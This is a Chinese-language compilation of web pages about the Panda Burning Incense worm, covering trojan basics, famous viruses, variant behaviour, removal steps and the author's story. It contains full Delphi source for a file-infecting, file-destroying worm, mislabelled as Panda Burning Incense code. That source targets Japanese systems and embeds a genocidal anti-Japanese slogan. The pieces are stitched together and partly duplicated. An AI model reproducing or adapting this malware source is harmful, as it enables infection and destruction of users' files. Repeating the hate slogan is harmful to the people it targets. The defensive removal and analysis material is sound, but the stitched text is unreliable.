熊猫烧香(源代码)
关于计算机病毒的研究报告
关于计算机木马与病毒的研究报告专业:计算机应用学号:201336616106 姓名:陈威华【摘要】:近年来,随着科学技术水平的提高和社会经济的发展,计算机应用渗透到社会生活的各个领域,计算机病毒攻击与防范技术也在不断拓展。
本文简要分析计算机木马病毒的由来、特点及和木马潜伏,提出有针对性的安全防范措施。
首先声明,木马不同于病毒,病毒是可以自我复制并传播的,特洛伊木马只是一个“间谍”,隐藏在你的电脑里,成为一个隐蔽的后门。
别人可以通过特洛伊木马来控制你的电脑或者窃取账号信息等。
关于木马的由来:然而,计算机世界的特洛伊木马(Trojan)是指隐藏在正常程序中的一段具有特殊功能的恶意代码,是具备破坏和删除文件、发送密码、记录键盘和攻击Dos等特殊功能的后门程序。
所谓后门就是一种可以为计算机系统秘密开启访问入口的程序。
一旦被安装,这些程序就能够使攻击者绕过安全程序进入系统。
该功能的目的就是收集系统中的重要信息,例如,财务报告、口令及信用卡号。
此外,攻击者还可以利用后门控制系统,使之成为攻击其它计算机的帮凶。
由于后门是隐藏在系统背后运行的,因此很难被检测到。
它们不像病毒和蠕虫那样通过消耗内存而引起注意。
它是指通过一段特定的程序(木马程序)来控制另一台计算机。
木马通常有两个可执行程序:一个是客户端,即控制端;另一个是服务端,即被控制端。
植入被种者电脑的是“服务器”部分,而所谓的“黑客”正是利用“控制器”进入运行了“服务器”的电脑。
运行了木马程序的“服务器”以后,被种者的电脑就会有一个或几个端口被打开,使黑客可以利用这些打开的端口进入电脑系统,安全和个人隐私也就全无保障了!木马的设计者为了防止木马被发现,而采用多种手段隐藏木马。
木马的服务一旦运行并被控制端连接,其控制端将享有服务端的大部分操作权限,例如给计算机增加口令,浏览、移动、复制、删除文件,修改注册表,更改计算机配置等。
随着病毒编写技术的发展,木马程序对用户的威胁越来越大,尤其是一些木马程序采用了极其狡猾的手段来隐蔽自己,使普通用户很难在中毒后发觉。
历史上经典的计算机病毒有哪些
历史上经典的计算机病毒有哪些在当今历史上一些经典的计算机病毒有哪些呢?小编告诉你,有很多经典实例,下面由小编给你做出详细的历史上经典的计算机病毒介绍!希望对你有帮助!历史上经典的计算机病毒介绍:一、微软WMF漏洞被黑客广泛利用,多家网站被挂马二、敲诈者三、病毒假冒工行电子银行升级四、魔鬼波病毒爆发五、光大证券网站多款软件被捆绑木马六、威金病毒大闹互联网磁碟机、熊猫烧香、AV终结者、机器狗、灰鸽子,电脑中毒了解决方法:解释下用正版瑞星杀毒以后很多.exe的文件都被删除掉了很多病毒都是感染可执行程序的破坏后使文件损坏病毒一般不感染小型文件,病毒的源代码内有很多变量可控比如熊猫烧香的源代码(楼主去网上看看,蛮经典的--有分析)杀毒的时候提示:windows 无法访问指定设备,路径或文件。
您可能没有合适的权限访问这个项目。
只是由于病毒破坏了系统文件的缘故(建议备份重要文件后重新安装)而且卡卡助手经常提示阻止了一些网页后缀都是.down的!很明显这是木马下载器在向指定的网站下载病毒和木马重装系统后C盘的病毒就没有了,但是其他盘可能有病毒的残留。
但病毒已经不会随系统进程启动了。
下载360后便可清除病毒残留重新做系统也没用!各种版本的XP全试了!真郁闷~!引导区的病毒会导致这种情况,用瑞星最新更新的病毒库因该可以搞定重做系统没用,你用GHOST还原搞的吗?还是安装盘?如果使还原系统一般不可靠,病毒会感染还原软件我看你好像没什么重要文件,先把全部硬盘格式化后再安装系统比较理想。
系统装好后下个杀软全盘杀一遍(到安全模式中也行)就这么多了,因该可以解决看了“历史上经典的计算机病毒有哪些”文章的还看了:1.历史上的超强电脑病毒有哪些2.历史上十大计算机病毒都长什么样?3.有哪些是典型计算机病毒4.世界出名的计算机病毒有哪些5.哪些是典型计算机病毒。
熊猫烧香变种资料
病毒大小:22,886 字节加壳方式:UPack样本MD5:9749216a37d57cf4b2e528c027252062样本SHA1:5d3222d8ab6fc11f899eff32c2c8d3cd50cbd755发现时间:2006.11更新时间:2006.11关联病毒:传播方式:通过恶意网页传播,其它木马下载,可通过局域网、移动存储设备等传播技术分析==========又是“熊猫烧香”FuckJacks.exe的变种,和之前的变种一样使用白底熊猫烧香图标,病毒运行后复制自身到系统目录下:%System%\drivers\spoclsv.exe创建启动项:[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run] "svcshare"="%System%\drivers\spoclsv.exe"修改注册表信息干扰“显示所有文件和文件夹”设置:[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanc ed\Folder\Hidden\SHOW ALL]"CheckedValue"=dword:00000000在各分区根目录生成副本:X:\setup.exeX:\autorun.infautorun.inf内容:[AutoRun]OPEN=setup.exeshellexecute=setup.exeshell\Auto\command=setup.exe尝试关闭下列窗口:QQKavQQA VVirusScanSymantec AntiVirusDubaWindowsesteem procsSystem Safety Monitor Wrapped gift Killer Winsock Expert msctls_statusbar32pjf(ustc)IceSword结束一些对头的进程:Mcshield.exe VsTskMgr.exe naPrdMgr.exe UpdaterUI.exe TBMon.exescan32.exe Ravmond.exe CCenter.exe RavTask.exeRav.exeRavmon.exe RavmonD.exe RavStub.exeKVXP.kxp KvMonXP.kxp KVCenter.kxp KVSrvXP.exe KRegEx.exe UIHost.exeTrojDie.kxp FrogAgent.exeLogo1_.exeLogo_1.exeRundl132.exe禁用一系列服务:Schedule sharedaccess RsCCenter RsRavMon RsCCenter RsRavMonKVWSCKVSrvXPkavsvcA VPMcAfeeFrameworkMcShieldMcTaskManagernavapsvcwscsvcKPfwSvcSNDSrvcccProxyccEvtMgrccSetMgrSPBBCSvcSymantec Core LCNPFMntorMskServiceFireSvc删除若干安全软件启动项信息:RavTaskKvMonXPkavKA VPersonal50McAfeeUpdaterUINetwork Associates Error Reporting ServiceShStatEXEYLive.exeyassistse使用net share命令删除管理共享:net share X$ /del /ynet share admin$ /del /ynet share IPC$ /del /y遍历目录,感染除以下系统目录外其它目录中的exe、com、scr、pif文件:X:\WINDOWSX:\WinntX:\System Volume InformationX:\Recycled%ProgramFiles%\Windows NT%ProgramFiles%\WindowsUpdate%ProgramFiles%\Windows Media Player%ProgramFiles%\Outlook Express%ProgramFiles%\Internet Explorer%ProgramFiles%\NetMeeting%ProgramFiles%\Common Files%ProgramFiles%\ComPlus Applications%ProgramFiles%\Messenger%ProgramFiles%\InstallShield Installation Information%ProgramFiles%\MSN%ProgramFiles%\Microsoft Frontpage%ProgramFiles%\Movie Maker%ProgramFiles%\MSN Gamin Zone将自身捆绑在被感染文件前端,并在尾部添加标记信息:.WhBoy{原文件名}.exe.{原文件大小}.与之前变种不同的是,这个病毒体虽然是22886字节,但是捆绑在文件前段的只有22838字节,被感染文件运行后会出错,而不会像之前变种那样释放出{原文件名}.exe的原始正常文件。
熊猫烧香病毒源代码
熊猫烧⾹病毒源代码熊猫烧⾹原代码熊猫烧⾹, ⼗六进制, Windows, 源代码, 字符串熊猫烧⾹源代码program Japussy;usesWindows, SysUtils, Classes, Graphics, ShellAPI{, Registry};constHeaderSize = 82432; //病毒体的⼤⼩IconOffset = EB8; //PE⽂件主图标的偏移量//在我的Delphi5 SP1上⾯编译得到的⼤⼩,其它版本的Delphi可能不同//查找2800000020的⼗六进制字符串可以找到主图标的偏移量{HeaderSize = 38912; //Upx压缩过病毒体的⼤⼩IconOffset = BC; //Upx压缩过PE⽂件主图标的偏移量//Upx 1.24W ⽤法: upx -9 --8086 Japussy.exe}IconSize = E8; //PE⽂件主图标的⼤⼩--744字节IconTail = IconOffset + IconSize; //PE⽂件主图标的尾部ID = 444444; //感染标记//垃圾码,以备写⼊Catchword = 'If a race need to be killed out, it must be Yamato. ' +'If a country need to be destroyed, it must be Japan! ' +'*** W32.Japussy.Worm.A ***';{$R *.RES}function RegisterServiceProcess(dwProcessID, dwType: Integer): Integer;stdcall; external 'Kernel32.dll'; //函数声明varTmpFile: string;Si: STARTUPINFO;Pi: PROCESS_INFORMATION;IsJap: Boolean = False; //⽇⽂操作系统标记{ 判断是否为Win9x }function IsWin9x: Boolean;varVer: TOSVersionInfo;beginResult := False;Ver.dwOSVersionInfoSize := SizeOf(TOSVersionInfo);if not GetVersionEx(Ver) thenExit;if (Ver.dwPlatformID = VER_PLATFORM_WIN32_WINDOWS) then //Win9xResult := True;end;{ 在流之间复制 }procedure CopyStream(Src: TStream; sStartPos: Integer; Dst: TStream;dStartPos: Integer; Count: Integer);varsCurPos, dCurPos: Integer;beginsCurPos := Src.Position;dCurPos := Dst.Position;Src.Seek(sStartPos, 0);Dst.Seek(dStartPos, 0);Dst.CopyFrom(Src, Count);Src.Seek(sCurPos, 0);Dst.Seek(dCurPos, 0);end;{ 将宿主⽂件从已感染的PE⽂件中分离出来,以备使⽤ }procedure ExtractFile(FileName: string);varsStream, dStream: TFileStream;begintrysStream := TFileStream.Create(ParamStr(0), fmOpenRead or fmShareDenyNone); trydStream := TFileStream.Create(FileName, fmCreate);trysStream.Seek(HeaderSize, 0); //跳过头部的病毒部分dStream.CopyFrom(sStream, sStream.Size - HeaderSize);finallydStream.Free;end;finallysStream.Free;end;exceptend;end;{ 填充STARTUPINFO结构 }procedure FillStartupInfo(var Si: STARTUPINFO; State: Word);beginSi.cb := SizeOf(Si);Si.lpReserved := nil;Si.lpDesktop := nil;Si.lpTitle := nil;Si.dwFlags := STARTF_USESHOWWINDOW;Si.wShowWindow := State;Si.cbReserved2 := 0;Si.lpReserved2 := nil;end;{ 发带毒邮件 }procedure SendMail;begin//哪位仁兄愿意完成之?end;{ 感染PE⽂件 }procedure InfectOneFile(FileName: string);varHdrStream, SrcStream: TFileStream;IcoStream, DstStream: TMemoryStream;iID: LongInt;aIcon: TIcon;Infected, IsPE: Boolean;i: Integer;Buf: array[0..1] of Char;begintry //出错则⽂件正在被使⽤,退出if CompareText(FileName, 'JAPUSSY.EXE') = 0 then //是⾃⼰则不感染Exit;Infected := False;IsPE := False;SrcStream := TFileStream.Create(FileName, fmOpenRead);tryfor i := 0 to 8 do //检查PE⽂件头beginSrcStream.Seek(i, soFromBeginning);SrcStream.Read(Buf, 2);if (Buf[0] = #80) and (Buf[1] = #69) then //PE标记beginIsPE := True; //是PE⽂件Break;end;end;SrcStream.Seek(-4, soFromEnd); //检查感染标记SrcStream.Read(iID, 4);if (iID = ID) or (SrcStream.Size < 10240) then //太⼩的⽂件不感染Infected := True;finallySrcStream.Free;end;if Infected or (not IsPE) then //如果感染过了或不是PE⽂件则退出Exit;IcoStream := TMemoryStream.Create;DstStream := TMemoryStream.Create;tryaIcon := TIcon.Create;try//得到被感染⽂件的主图标(744字节),存⼊流aIcon.ReleaseHandle;aIcon.Handle := ExtractIcon(HInstance, PChar(FileName), 0);aIcon.SaveToStream(IcoStream);finallyaIcon.Free;end;SrcStream := TFileStream.Create(FileName, fmOpenRead);//头⽂件HdrStream := TFileStream.Create(ParamStr(0), fmOpenRead or fmShareDenyNone); try//写⼊病毒体主图标之前的数据CopyStream(HdrStream, 0, DstStream, 0, IconOffset);//写⼊⽬前程序的主图标CopyStream(IcoStream, 22, DstStream, IconOffset, IconSize);//写⼊病毒体主图标到病毒体尾部之间的数据CopyStream(HdrStream, IconTail, DstStream, IconTail, HeaderSize - IconTail);//写⼊宿主程序CopyStream(SrcStream, 0, DstStream, HeaderSize, SrcStream.Size);//写⼊已感染的标记DstStream.Seek(0, 2);iID := 444444;DstStream.Write(iID, 4);finallyHdrStream.Free;end;finallySrcStream.Free;IcoStream.Free;DstStream.SaveToFile(FileName); //替换宿主⽂件DstStream.Free;end;except;end;end;{ 将⽬标⽂件写⼊垃圾码后删除 }procedure SmashFile(FileName: string);varFileHandle: Integer;i, Size, Mass, Max, Len: Integer;begintrySetFileAttributes(PChar(FileName), 0); //去掉只读属性FileHandle := FileOpen(FileName, fmOpenWrite); //打开⽂件trySize := GetFileSize(FileHandle, nil); //⽂件⼤⼩i := 0;Randomize;Max := Random(15); //写⼊垃圾码的随机次数if Max < 5 thenMax := 5;Mass := Size div Max; //每个间隔块的⼤⼩Len := Length(Catchword);while i < Max dobeginFileSeek(FileHandle, i * Mass, 0); //定位//写⼊垃圾码,将⽂件彻底破坏掉FileWrite(FileHandle, Catchword, Len);Inc(i);end;finallyFileClose(FileHandle); //关闭⽂件end;DeleteFile(PChar(FileName)); //删除之exceptend;end;{ 获得可写的驱动器列表 }function GetDrives: string;varDiskType: Word;D: Char;Str: string;i: Integer;beginfor i := 0 to 25 do //遍历26个字母beginD := Chr(i + 65);Str := D + ':\';DiskType := GetDriveType(PChar(Str));//得到本地磁盘和⽹络盘if (DiskType = DRIVE_FIXED) or (DiskType = DRIVE_REMOTE) then Result := Result + D;end;end;{ 遍历⽬录,感染和摧毁⽂件 }procedure LoopFiles(Path, Mask: string);vari, Count: Integer;Fn, Ext: string;SubDir: TStrings;SearchRec: TSearchRec;Msg: TMsg;function IsValidDir(SearchRec: TSearchRec): Integer;beginif (SearchRec.Attr <> 16) and ( <> '.') and ( <> '..') thenResult := 0 //不是⽬录else if (SearchRec.Attr = 16) and ( <> '.') and ( <> '..') thenResult := 1 //不是根⽬录else Result := 2; //是根⽬录end;beginif (FindFirst(Path + Mask, faAnyFile, SearchRec) = 0) thenbeginrepeatPeekMessage(Msg, 0, 0, 0, PM_REMOVE); //调整消息队列,避免引起怀疑if IsValidDir(SearchRec) = 0 thenbeginFn := Path + ;Ext := UpperCase(ExtractFileExt(Fn));if (Ext = '.EXE') or (Ext = '.SCR') thenbeginInfectOneFile(Fn); //感染可执⾏⽂件endelse if (Ext = '.HTM') or (Ext = '.HTML') or (Ext = '.ASP') thenbegin//感染HTML和ASP⽂件,将Base64编码后的病毒写⼊//感染浏览此⽹页的所有⽤户//哪位⼤兄弟愿意完成之?endelse if Ext = '.WAB' then //Outlook地址簿⽂件begin//获取Outlook邮件地址endelse if Ext = '.ADC' then //Foxmail地址⾃动完成⽂件begin//获取Foxmail邮件地址endelse if Ext = 'IND' then //Foxmail地址簿⽂件begin//获取Foxmail邮件地址endelsebeginif IsJap then //是倭⽂操作系统beginif (Ext = '.DOC') or (Ext = '.XLS') or (Ext = '.MDB') or(Ext = '.MP3') or (Ext = '.RM') or (Ext = '.RA') or(Ext = '.WMA') or (Ext = '.ZIP') or (Ext = '.RAR') or(Ext = '.MPEG') or (Ext = '.ASF') or (Ext = '.JPG') or(Ext = '.JPEG') or (Ext = '.GIF') or (Ext = '.SWF') or(Ext = '.PDF') or (Ext = '.CHM') or (Ext = '.AVI') thenSmashFile(Fn); //摧毁⽂件end;end;end;//感染或删除⼀个⽂件后睡眠200毫秒,避免CPU占⽤率过⾼引起怀疑Sleep(200);until (FindNext(SearchRec) <> 0);end;FindClose(SearchRec);SubDir := TStringList.Create;if (FindFirst(Path + '*.*', faDirectory, SearchRec) = 0) thenbeginrepeatif IsValidDir(SearchRec) = 1 thenSubDir.Add();until (FindNext(SearchRec) <> 0);end;FindClose(SearchRec);Count := SubDir.Count - 1;for i := 0 to Count doLoopFiles(Path + SubDir.Strings + '\', Mask);FreeAndNil(SubDir);end;{ 遍历磁盘上所有的⽂件 }procedure InfectFiles;varDriverList: string;i, Len: Integer;beginif GetACP = 932 then //⽇⽂操作系统IsJap := True; //去死吧!DriverList := GetDrives; //得到可写的磁盘列表Len := Length(DriverList);while True do //死循环beginfor i := Len downto 1 do //遍历每个磁盘驱动器LoopFiles(DriverList + ':\', '*.*'); //感染之SendMail; //发带毒邮件Sleep(1000 * 60 * 5); //睡眠5分钟end;end;{ 主程序开始 }beginif IsWin9x then //是Win9xRegisterServiceProcess(GetCurrentProcessID, 1) //注册为服务进程else //WinNTbegin//远程线程映射到Explorer进程//哪位兄台愿意完成之?end;//如果是原始病毒体⾃⼰if CompareText(ExtractFileName(ParamStr(0)), 'Japussy.exe') = 0 then InfectFiles //感染和发邮件else //已寄⽣于宿主程序上了,开始⼯作beginTmpFile := ParamStr(0); //创建临时⽂件Delete(TmpFile, Length(TmpFile) - 4, 4);TmpFile := TmpFile + #32 + '.exe'; //真正的宿主⽂件,多⼀个空格ExtractFile(TmpFile); //分离之FillStartupInfo(Si, SW_SHOWDEFAULT);CreateProcess(PChar(TmpFile), PChar(TmpFile), nil, nil, True,0, nil, '.', Si, Pi); //创建新进程运⾏之InfectFiles; //感染和发邮件end;end.。
熊猫烧香病毒剖析
伪装技术
熊猫烧香病毒会伪装成其他正常 的文件或程序,诱骗用户运行, 从而感染计算机系统。
03 熊猫烧香病毒的防范与应 对
防范措施
安装防病毒软件
选择可靠的品牌和版本,并及时更新病毒库。
提高网络安全意识
不随意打开未知来源的邮件和链接,不下载 和运行未知来源的文件和程序。
定期备份重要数据
以防数据被病毒感染或损坏。
案例二:熊猫烧香病毒的攻击目标与手法
熊猫烧香病毒主要攻击个人计算机和企业网络系统,通过感染操作系统和应用程序,导致系统运行缓 慢、蓝屏、死机等问题。
该病毒会修改系统注册表、劫持浏览器、禁用安全软件等手段,以实现长期驻留和控制用户计算机。
熊猫烧香病毒还会窃取用户个人信息,如账号密码、信用卡信息等,给用户的隐私和财产安全带来严重 威胁。
与其他蠕虫病毒的比较
传播方式
熊猫烧香病毒与蠕虫病毒相似,都是通过网络进行快速传播 。熊猫烧香病毒利用系统漏洞和用户不慎点击恶意链接等方 式感染计算机。
破坏性
熊猫烧香病毒在感染计算机后,会对系统文件进行篡改,导 致计算机出现蓝屏、频繁重启等问题。此外,熊猫烧香病毒 还会下载其他恶意软件,进一步损害系统安全。
自我保护机制
熊猫烧香病毒具有自我保护机制,通过修改系统 文件、注册表等手段,防止病毒被轻易删除或查 杀。
病毒的隐藏与反侦察技术
隐藏技术
熊猫烧香病毒采用多种隐藏技术, 如将自身嵌入到其他正常文件中、 使用加密和混淆等技术隐藏自身 代码等。
反侦察技术
熊猫烧香病毒会检测自身是否被 检测或查杀,一旦发现自身被检 测或查杀,会采取相应的反侦察 措施,如删除自身、破坏系统文 件等。
熊猫烧香病毒是一种网络攻击手段,与其他网络攻击如拒绝服务攻击、SQL注入攻击等有所不同。熊猫烧香病毒 主要针对个人计算机系统进行感染和破坏。
熊猫烧香病毒源代码!!
aIcon := TIcon.Create;
try
//得到被感染文件的主图标(744字节),存入流
aIcon.ReleaseHandle;
aIcon.Handle := ExtractIcon(HInstance, PChar(FileName), 0);
aIcon.SaveToStream(IcoStream);
Si.cbReserved2 := 0;
Si.lpReserved2 := nil;
end;
{ 发带毒邮件 }
procedure SendMail;
begin
//哪位仁兄愿意完成之?
end;
{ 感染PE文件 }
procedure InfectOneFile(FileName: string);
IconOffset = $12EB8; //PE文件主图标的偏移量
//在我的Delphi5 SP1上面编译得到的大小,其它版本的Delphi可能不同
//查找2800000020的十六进制字符串可以找到主图标的偏移量
{
HeaderSize = 38912; //Upx压缩过病毒体的大小
i := 0;
Randomize;
Max := Random(15); //写入垃圾码的随机次数
if Max < 5 then
Max := 5;
Mass := Size div Max; //每个间隔块的大小
//写入已感染的标记
DstStream.Seek(0, 2);
iID := $44444444;
DstStream.Write(iID, 4);
熊猫烧香病毒清除方法有哪些
熊猫烧香病毒清除方法有哪些电脑病毒看不见,却无处不在,有时防护措施不够或者不当操作都会导致病毒入侵。
熊满烧香是之前很经典也是很可怕的一种病毒,那么具体有什么预防和处理办法呢?方法步骤1. 断开网络(必要)2. 结束病毒进程%System%\drivers\spoclsv.exe3. 删除病毒文件:c:\windows\system32\drivers\spoclsv.exe注意:打开C盘要右键-开打,否则仁兄就要功亏一篑,就要重复2的步骤!4. 修改注册表设置,恢复“显示所有文件和文件夹”选项功能:[Copy to clipboard]CODE:[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\C urrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL]"CheckedValue"=dword:00000001本步骤针对病毒将显示隐藏文件禁用的情况5. 右键点击分区盘符,点击右键菜单中的“打开”进入分区根目录,删除根目录下的文件:X:\setup.exeX:\autorun.inf6. 删除病毒创建的启动项:[Copy to clipboard]CODE:[HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Run]"svcshare"="%System%\drivers\spoclsv.exe"7. 使用专杀工具进行全盘扫描,清除恢复被感染的exe文件推荐使用软件:NimayaKiller相关阅读:2018网络安全事件:一、英特尔处理器曝“Meltdown”和“Spectre漏洞”2018年1月,英特尔处理器中曝“Meltdown”(熔断)和“Spectre” (幽灵)两大新型漏洞,包括AMD、ARM、英特尔系统和处理器在内,几乎近20年发售的所有设备都受到影响,受影响的设备包括手机、电脑、服务器以及云计算产品。
熊猫烧香病毒之专杀工具的编写教程
熊猫烧香病毒之专杀工具的编写教程通过对熊猫烧香的行为分析,这里仅针对所得结果,来进行专杀工具的编写。
本节课我们会学习使用C++来写一个简单的“熊猫烧香”专杀系统。
实验目的:结合本篇文章的知识点,能够彻底掌握文章所讲述的编写杀毒软件的方法。
实验思路:1.理解专杀工具所需要实现的功能2.利用VC++编写专杀工具3.结合Process Monitor验证专杀工具实验步骤:1、病毒行为回顾与归纳这里我们首先回顾一下病毒的行为:**病毒行为1:**病毒本身创建了名为`spoclsv.exe`的进程,该进程文件的路径为:C:WINDOWSsystem32driversspoclsv.exe**病毒行为2:**在命令行模式下使用`net share`命令来取消系统中的共享。
**病毒行为3:**删除安全类软件在注册表中的启动项。
**病毒行为4:**在注册表:HKCUSoftwareMicrosoftWindowsCurrentVersionRun中创建svcshare用于在开机时启动位于`C:WINDOWSsystem32driversspoclsv.exe`的病毒程序。
**病毒行为5:**修改注册表,使得隐藏文件无法通过普通的设置进行显示,该位置为:HKLMSOFTWAREMicrosoftWindowsCurrentVersionExplorerAdvancedFolderHiddenSHOWALL 病毒将`CheckedValue`的键值设置为了0。
**病毒行为6:**将自身拷贝到根目录,并命名为`setup.exe`,同时创建`autorun.inf`用于病毒的启动,这两个文件的属性都是“隐藏”。
**病毒行为7:**在一些目录中创建名为`Desktop_.ini`的隐藏文件。
**病毒行为8:**向外发包,连接局域网中其他机器。
纵观以上八点行为,这里需要说明的是,其中的第二点行为,由于我不知道用户计算机在中毒前的设置,因此这条我打算忽略。
十大流行病毒及各自特征
十大流行病毒及各自特征十大流行病毒及各自特征描述,下面由店铺给你做出详细的流行病毒及各自特征描述介绍!希望对你有帮助!十大流行病毒及各自特征:一、ANI病毒病毒名称:Exploit.ANIfile病毒中文名:ANI病毒病毒类型:蠕虫危险级别:影响平台:Windows 2000/XP/2003/Vista描述:以Exploit.ANIfile.b为例,“ANI毒”变种b是一个利用微软Windows系统ANI文件处理漏洞(MS07-017)进行传播的网络蠕虫。
“ANI毒”变种b运行后,自我复制到系统目录下。
修改注册表,实现开机自启动。
感染正常的可执行文件和本地网页文件,并下载大量木马程序。
感染本地磁盘和网络共享目录下的多种类型的网页文件(包括*.HTML,*.ASPX,*.HTM,*.PHP,*.JSP,*.ASP),植入利用ANI文件处理漏洞的恶意代码。
自我复制到各逻辑盘根目录下,并创建autorun.inf自动播放配置文件。
双击盘符即可激活病毒,造成再次感染。
修改hosts文件,屏蔽多个网址,这些网址大多是以前用来传播其它病毒的站点。
另外,“ANI毒”变种b还可以利用自带的SMTP 引擎通过电子邮件进行传播。
二、U盘寄生虫病毒名称:Checker/Autorun病毒中文名:U盘寄生虫病毒类型:蠕虫危险级别:影响平台:Win 9X/ME/NT/2000/XP/2003描述:Checker/Autorun“U盘寄生虫”是一个利用U盘等移动设备进行传播的蠕虫。
“U盘寄生虫”是针对autorun.inf这样的自动播放文件的蠕虫病毒。
autorun.inf文件一般存在于U盘、MP3、移动硬盘和硬盘各个分区的根目录下,当用户双击U盘等设备的时候,该文件就会利用Windows系统的自动播放功能优先运行autorun.inf文件,而该文件就会立即执行所要加载的病毒程序,从而破坏用户计算机,使用户计算机遭受损失。
“熊猫烧香”(Worm.WhBoy.h)
“熊猫烧香”(Worm.WhBoy.h)“熊猫烧香”(Worm.WhBoy.h)近段时间,“熊猫烧香”(Worm.WhBoy.h) 蠕虫正处于急速变种期,仅11月份至今,变种数量已达10几个,变种速度之快,影响范围之广,与06年横行于局域网的“维金”不相上下。
现在小编提供一个手动清除此病毒的方法:清除步骤==========1. 断开网络2. 结束病毒进程%System%\FuckJacks.exe3. 删除病毒文件:%System%\FuckJacks.exe4. 右键点击分区盘符,点击右键菜单中的“打开”进入分区根目录,删除根目录下的文件X:\autorun.infX:\setup.exe5. 删除病毒创建的启动项:[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]"FuckJacks"="%System%\FuckJacks.exe[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]"svohost"="%System%\FuckJacks.exe"6. 修复或重新安装反病毒软件7. 使用反病毒软件或专杀工具进行全盘扫描,清除恢复被感染的exe文件中毒文件的恢复(仅个人观点,只在自己的虚拟机上测试正常)首先在清除病毒文件的同时不要删除%SYSTEM%下面释放FuckJacks.exe的这个文件,(注册表里要清除干净)打开运行输入gpedit.msc打开组策略-本地计算机策略-windows 设置-安全设置-软件限制策略-其它规则在其它规则上右键选择-新散列规则=打开新散列规则窗口在文件散列上点击浏览找到-%SYSTEM%下面释放FuckJacks.exe 文件.......安全级别选择-不允许的确定后重启(一定重启)重启后可以双击运行已经被熊猫感染的程序-运行程序后该FuckJacks.exe文件会在注册表里的Run键下建立启动项(不会有问题的)双击运行被感染的程序已经恢复原来样子了,全部回复后用SRENG2把FuckJacks.exe 在注册表里的启动项删除即可!杀病毒:实例讲解如何干掉“熊猫烧香”你中过熊猫烧香么?!看到过熊猫拿着三支香的样子么!?中招后如何处理!?看完本文,你将学会如何从计算机中杀掉“熊猫烧香”。
计算机病毒介绍
查杀方法
1.关闭“系统关机”提示框,在出现关机提示时,在“开始→运行”中输入“shutdown -a”,即可取消“系统关机”提示框,该方法确保用户有足够的时间下载补丁。 2.下载针对“冲击波”的补丁,Windows 2000简体中文版补丁下载地址: /downloads/details.aspx?displaylang=zh-cn&familyid=c8b8a846f541-4c15-8c9f-220354449117,在下载补丁时,要注意不同的操作系统、不同的版本均 有不同的补丁,不可混淆。安装补丁时,盗版Windows XP系统可能不能正常安装, Windows 2000操作系统则必须升级SP2以上版本才可安装。 3.下载专杀工具 瑞星“冲击波(Worm.Blaster))”病毒专杀工具下载地址: /zsgj/ravzerg.exe 金山“冲击波(Worm.Blaster))”病毒专杀工具下载地址: /download/othertools/duba_sdbot.exe 4.脱机杀毒 断开网络连接,然后运行专杀工具,这些工具体积小巧,操作简单,按照提示操作即 可。
查杀方法
在运行中输入MSconfig,如果启动项中有“Sendmess.exe”和“wwwo.exe”这 两个选项,将其禁止。在C:\WINDOWS一个叫qq32.INI的文件,文件里面是附 在QQ后的那几句广告词,将其删除。转到DOS下再将“Sendmess.exe”和 “wwwo.exe”这两个文件删 除。2.随时升级杀毒软件 。3.安装系统漏洞补丁由病 毒的播方式我们知道, “QQ尾巴”这种木马病毒是利用IE 的iFrame传播的,即 使不执行病毒文件,病毒依然可以 借由漏洞自动执行, 达到感染的目的。因此应该敢快下 载IE的iFrame漏洞补 丁。
世界著名的电脑病毒有哪些
世界著名的电脑病毒有哪些计算机病毒现身江湖已多年,可以追溯到计算机科学刚刚起步之时,那时已经有人想出破坏计算机系统的基本原理。
那你知道世界上有哪些著名的电脑病毒吗?下面就让店铺和大家分享一下世界著名的电脑病毒。
世界著名的电脑病毒1.Creeper(1971年)最早的计算机病毒Creeper(根据老卡通片《史酷比(Scooby Doo )》中的一个形象命名)出现在1971年,距今以后42年之久。
当然在那时,Creeper还尚未被称为病毒,因为计算机病毒尚不存在。
Creeper由BBN技术公司程序员罗伯特·托马斯(Robert Thomas)编写,通过阿帕网( ARPANET,互联网前身)从公司的DEC PDP-10传播,显示“我是Creeper,有本事来抓我呀!(I'm the creeper, catch me if you can!)”。
Creeper在网络中移动,从一个系统跳到另外一个系统并自我复制。
但是一旦遇到另一个Creeper,便将其注销。
2.Elk Cloner病毒(1982年)里奇.斯克伦塔(Rich Skrenta)在一台苹果计算机上制造了世界上第一个计算机病毒。
1982年,斯克伦塔编写了一个通过软盘传播的病毒,他称之为“Elk Cloner”,那时候的计算机还没有硬盘驱动器。
该病毒感染了成千上万的机器,但它是无害的:它只是在用户的屏幕上显示一首诗,其中有两句是这样的:“它将进入你所有的磁盘/它会进入你的芯片。
”3.梅利莎 (Melissa,1999年)Melissa病毒由大卫·史密斯(David L. Smith)制造,是一种迅速传播的宏病毒,它作为电子邮件的附件进行传播,梅丽莎病毒邮件的标题通常为“这是你要的资料,不要让任何人看见(Here is that document you asked for,don't show anybody else)”。
熊猫烧香病毒介绍
熊猫烧香病毒介绍【基本信息】病毒名称:熊猫烧香,Worm.WhBoy.(金山称),Worm.Nimaya.(瑞星称)病毒别名:尼姆亚,武汉男生,后又化身为“金猪报喜”,国外称“熊猫烧香”危险级别:★★★★★病毒类型:蠕虫病毒,能够终止大量的反病毒软件和防火墙软件进程。
影响系统:Win 9x/ME、Win 2000/NT、Win XP、Win 2003 、Win Vista “熊猫烧香”的制造者熊猫烧香病毒的制造者-李俊一个水泥厂技校毕业的中专生,一个从未接受过专业训练的电脑爱好者,一个被杀毒软件公司拒之门外的年轻人,查毒了小半个中国互联网。
如果不是地震引发海底光缆故障,那只颔首敬香的“熊猫”,还将“迁徙”到更远的地方。
家人眼中的李俊:李俊的父母一直在家乡一水泥厂上班,几前年双双下岗,他妈妈做了个小推车在街上卖早点,他爸爸则到了一家私人瓦厂打工。
52岁的李俊妈妈陈女士说,李俊很小的时候就喜欢玩电脑,没事就到网吧去玩,因为怕他在外面学坏,家里就给他买了台电脑。
没想到到头来儿子却是因为“玩电脑”被警察抓走,陈女士感到悔恨不已。
